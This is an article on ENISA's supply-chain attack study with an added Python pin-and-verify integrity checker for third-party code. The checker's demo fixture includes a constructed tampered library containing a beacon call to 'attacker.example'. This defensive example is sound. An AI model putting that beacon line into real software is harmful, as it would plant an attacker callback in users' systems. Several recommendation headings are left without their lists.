It is quite feasible that the quiet, unassuming person sitting in the corner of a coffee shop in downtown Lagos, London or Lisbon, tapping away contentedly on a laptop keyboard, is about to bring a global corporation to its knees and demand millions of dollars to repair the damage.
Such is the world of the cybercriminal.
You may never know the perpetrators of these crimes. You may never understand how much is paid to them. You may never begin to contemplate that some corporations are reportedly assigning their own hackers to ‘hack back’ at those targeting them, which can be as dangerous as it sounds. What we do know, however, is that the people behind these attacks are busier than ever before. As insurer TT Club recently stated on cyber risk: ‘Be alert and expect the attack; it’s not if but when.’
The European Union Agency for Cybersecurity, also known as ENISA, agrees. Its new study ‘Threat Landscape for Supply Chain Attacks,’ which analysed 24 such incidents between January 2020 and July 2021, predicts four times as many supply chain attacks in 2021 as in 2020.
It issues a very clear and frank assessment: strong security protection is no longer enough for organisations, because attackers have already shifted their attention to suppliers, with an increasing impact such as downtime of systems, monetary loss and reputational damage. ‘You’re only as strong as your weakest link’ has never been a more pertinent statement when it comes to cybersecurity.
The EU Agency for Cybersecurity’s mapping of emerging supply chain crimes found 66% of attacks focus on the supplier’s code. “Supply chain attacks have been a concern for cybersecurity experts for many years because the chain reaction triggered by one attack on a single supplier can compromise a network of providers,” it states.
In 62% of the cases, malware was the attack technique employed. This evidence stresses the need for policymakers and the cybersecurity community to act now with novel protective measures to prevent and respond to potential supply chain attacks in the future, ENISA says.
Why is a good level of cybersecurity not good enough?
Composed of an attack on one or more suppliers followed by a later attack on the final target, namely the customer, supply chain attacks may take months to succeed, the EU Agency found. ‘In many instances, such an attack may even go undetected for a long time. Similar to Advanced Persistent Threat (APT) attacks, supply chain cyber incidents are usually targeted, quite complex and costly, with attackers probably planning them well in advance. All such aspects reveal the degree of sophistication of the adversaries and the persistence in seeking to succeed.’
Organisations could be vulnerable to a supply chain attack even when their own defences are quite good, ENISA adds, with attackers exploring new potential highways to infiltrate organisations by targeting their suppliers. Moreover, because a single compromised supplier can reach an almost limitless number of customers, these types of attacks are becoming increasingly common. In about 66% of the reported incidents, attackers compromised the supplier’s code in order to reach the targeted customers, which is why organisations need to validate third-party code and software before use and confirm it has not been tampered with or manipulated.
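What ‘validating third-party code before use’ looks like in practice is a pin-and-verify step: the digest of a reviewed artifact is recorded once, and every later copy of that artifact is checked against the pin before it is installed. The script below is an added example written for this page; it is not code from ENISA, TAPA or any supplier. The artifact names, file contents and manifest layout are constructed for the demonstration, and the manifest is a plain dictionary standing in for whatever lock file a project actually keeps.

```python
"""Pin-and-verify integrity check for third-party artifacts.

Added example, not from the ENISA report. All artifact bytes, names and the
manifest format are constructed for illustration only.
"""
import hashlib
import hmac
from typing import Dict


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 of an artifact's bytes."""
    return hashlib.sha256(data).hexdigest()


def record_pin(manifest: Dict[str, str], name: str, data: bytes) -> str:
    """Pin an artifact at review time by storing its digest in the manifest.

    This happens once, after the artifact has been reviewed and its digest
    cross-checked against the supplier's published value. The pin is only
    as trustworthy as that review.
    """
    digest = sha256_hex(data)
    manifest[name] = digest
    return digest


def verify_artifact(manifest: Dict[str, str], name: str, data: bytes) -> bool:
    """Verify a fetched artifact against its pinned digest before using it.

    An artifact with no pin is rejected (nothing recorded means no trust),
    as is any digest mismatch. hmac.compare_digest does a constant-time
    comparison so the check does not leak where the digests differ.
    """
    expected = manifest.get(name)
    if expected is None:
        return False
    return hmac.compare_digest(sha256_hex(data), expected)


def check_release(manifest: Dict[str, str], files: Dict[str, bytes]) -> Dict[str, str]:
    """Check every file of a fetched release.

    Returns a map of artifact name to 'ok', 'tampered' or 'unpinned'. Any
    status other than 'ok' should block installation rather than warn.
    """
    results: Dict[str, str] = {}
    for name, data in files.items():
        if name not in manifest:
            results[name] = "unpinned"
        elif verify_artifact(manifest, name, data):
            results[name] = "ok"
        else:
            results[name] = "tampered"
    return results


# Constructed sample artifacts (not real software). The 'tampered' copy has
# an extra beacon call inserted, the kind of change a compromised supplier
# build would ship.
REVIEWED_LIB = b"def connect(host):\n    return open_socket(host, 443)\n"
TAMPERED_LIB = (
    b"def connect(host):\n"
    b"    beacon('attacker.example')\n"
    b"    return open_socket(host, 443)\n"
)

# Manifest populated at review time, before any later download is trusted.
MANIFEST: Dict[str, str] = {}
record_pin(MANIFEST, "vendorlib-1.4.2.py", REVIEWED_LIB)


def demo() -> Dict[str, str]:
    """Simulate a later release fetch where one file was altered after review
    and another was never reviewed at all."""
    release = {
        "vendorlib-1.4.2.py": TAMPERED_LIB,
        "vendorlib-extra.py": b"print('hi')\n",
    }
    return check_release(MANIFEST, release)


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{name}: {status}")
```

The caveat a practitioner should keep in mind is that a pin only proves the artifact matches what was reviewed. If the supplier’s build pipeline is compromised before the release is published (the ‘supplier’s code’ case the report counts), the published checksum and signature will match the malicious artifact, so pinning has to be combined with reviewing what was pinned, and ideally with a second, independent source for the expected digest.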
In some 58% of the supply chain incidents analysed, the customer assets targeted were predominantly customer data, including Personally Identifiable Information (PII) and intellectual property. In 66% of the supply chain attacks reviewed, suppliers did not know, or failed to report, how they had been compromised.
Apply good practices and engage in coordinated actions
‘The impact of attacks on suppliers may have far-reaching consequences because of the increased interdependencies and complexities of the techniques used. Beyond the damages on affected organisations and third parties, there is a deeper cause for concern when classified information is exfiltrated and national security is at stake or when consequences of a geopolitical nature could emerge as a result. In this complex environment for supply chains, establishing good practices and getting involved in coordinated actions at EU level are both important to support all Member States in developing similar capabilities – to reach a common level of security,’ the report advises.
In the report, ENISA offers a number of recommendations for customers to manage supply chain cybersecurity risks and their supplier relationships.
Recommendations to manage cyber risk
To manage supply chain cybersecurity risk, the study recommends customers should:
Additionally, to manage their relationships with suppliers, ENISA highlights measures customers should adopt aimed at preventing cyberattacks, including:
Moreover, as any product or service is built from or based on components and software that is subject to vulnerabilities, suppliers should implement good practices for vulnerability management, such as:
The study concludes: ‘As the cost of direct attacks against well-protected organisations increases, attackers prefer to attack their supply chain, which provides the additional motivation of a potentially large-scale and cross-border impact. This migration has resulted in a larger-than-usual number of supply chain attack cases reported, with a forecast of four times more supply chain attacks in 2021 than in 2020. The inherent global nature of current supply chains increases the potential impact of these attacks and broadens the attack surface for malicious actors.
‘This report covers a number of known attacks but in reality, there may be more supply chain attacks that go undetected, not investigated or attributed to other causes. Particularly in software, supply chain attacks undermine trust in the software ecosystem. The analysis in this report shows that there are still a large number of unknown factors in the incidents investigated. 66% of the attack vectors used on suppliers remain unknown. A lack of transparency or the ability to investigate poses a serious risk to the trust of the supply chain.
‘Improving the process of transparency and accountability is the first step to improving the security of all elements in the supply chain and protecting final customers. Supply chain attacks can be complex, require careful planning and often take months or years to execute. While more than 50% of these attacks are attributed to APT groups or well-known attackers, the effectiveness of supply chain attacks may make suppliers an interesting target for other, more generic, types of attackers in the future. It is therefore critical that organisations focus their security not only in their own organisations, but also on their suppliers.’